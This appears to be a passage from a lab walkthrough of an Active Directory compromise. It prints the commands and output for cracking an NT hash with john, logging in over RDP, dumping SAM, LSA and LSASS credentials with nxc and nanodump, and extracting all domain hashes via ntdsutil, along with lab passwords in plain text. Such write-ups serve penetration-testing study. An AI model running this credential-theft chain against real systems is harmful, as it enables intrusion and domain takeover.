$SMB 10.0.2.7 445 CLIENT-1 [-] CLIENT-1\Administrator:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED

Cracked Brian’s hash with john brian : Iloveyou:D

🐺 howlsec@kali
$john --wordlist=/usr/share/wordlists/rockyou.txt h --format=nt
$Using default input encoding: UTF-8
$Loaded 3 password hashes with no different salts (NT [MD4 128/128 SSE2 4x3])
$Remaining 2 password hashes with no different salts
$Warning: no OpenMP support for this hash type, consider --fork=8
$Press 'q' or Ctrl-C to abort, almost any other key for status
$Iloveyou:D (Brian)
$1g 0:00:00:00 DONE (2026-02-15 02:27) 1.234g/s 17708Kp/s 17708Kc/s 31379KC/s markinho..*7¡Vamos!
$Warning: passwords printed above might not be all those cracked
$Use the "--show --format=NT" options to display all of the cracked passwords reliably
$Session completed.

Now I can rdp with brian and we see that he is part of Administrators group

🐺 howlsec@kali
$xfreerdp3 /v:10.0.2.7 /u:'Brian' /p:'Iloveyou:D' /cert:ignore /dynamic-resolution /drive:linux,/opt/ +clipboard

(screenshot omitted) Since Brian is not part of the Domain users but he is part of Administrators group on Client 1, you need to add jbailey to dump the hashes (screenshot omitted)

🐺 howlsec@kali
$nxc smb 10.0.2.7 -u 'jbailey' -p 'Paulio*3' --sam
$nxc smb 10.0.2.7 -u 'jbailey' -p 'Paulio*3' -M nanodump | fgrep -v '[' | awk -F: '{print $2}' | tee -a dumped_hashes.txt
$nxc smb 10.0.2.7 -u 'jbailey' -p 'Paulio*3' --lsa | awk '{print $5}' | fgrep '/' | tee mscash_hashes

(screenshot omitted) Now we have credentials for Domain admin and can dump all Domain hashes amorales : Seduction?1

🐺 howlsec@kali
$nxc smb 10.0.24 -u 'amorales' -p 'Seduction?1' -M ntdsutil | fgrep -v '[' | awk -F: '{print $4}' | tee -a dumped_hashes.txt

(screenshot omitted)